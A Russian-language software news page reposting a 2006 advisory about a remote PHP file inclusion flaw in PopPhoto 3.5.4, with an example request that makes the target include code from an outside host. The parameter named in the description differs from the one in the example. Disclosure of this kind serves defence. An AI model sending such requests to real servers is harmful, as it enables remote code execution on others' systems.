Новый софт - PHP-инклюдинг в PopPhoto


Имя пользователя: Пароль: Новый пользователь Потеряли ваш пароль?


Soft навколо WareZebra.com Заказ файлов в UA-IX! Игровой портал Новый Софт mobime.ru Soft Page


График Вашей работы? Полная занятость Частичная занятость Временная занятость Не работаю Результаты 853 голосов \| 0 Комментарии


Гости: 7


КОММЕНТАРИИ за 2 дня Нет новых комментариев

Новый софт - PHP-инклюдинг в PopPhoto

PHP-инклюдинг в PopPhoto

05/17/06 2006 @ 01:38 PM EEST
Новый софт - Скачать программы, exe файлы, бизнес новости, скачать игры, технологии взлома и защиты, qip, icq

Программа: PopPhoto 3.5.4, возможно другие версии.

Опасность: Критическая

Наличие эксплоита: Да

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "cfg[popphoto_base_path]" в сценарии resources/includes/popp.config.loader.inc.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:
http://[target]/[path]/resources/includes/popp.config.loader.inc.php?
include_path=http://unsecured-systems.com/forum/

URL производителя: pixaria.com/popphoto/

Решение: Способов устранения уязвимости не существует в настоящее время.

PHP-инклюдинг в PopPhoto | 0 Комментарии | Создать учётную запись

Следующие комментарии принадлежат тем, кто их опубликовал. Этот сайт не несёт ответственности за содержание комментариев.

RedTram

Копирайт © 2010 Новый софт
Все торговые марки и копирайты на этой странице являются собственностью соответствующих хозяев.
Для связи с администрацией сайта, телефон в Киеве 5927467, ICQ 5714034
Новый софт - Скачать программы, exe файлы, бизнес новости, скачать игры, технологии взлома и защиты, qip, icq

Работает на Geeklog
Страница создана за 0.18 секунд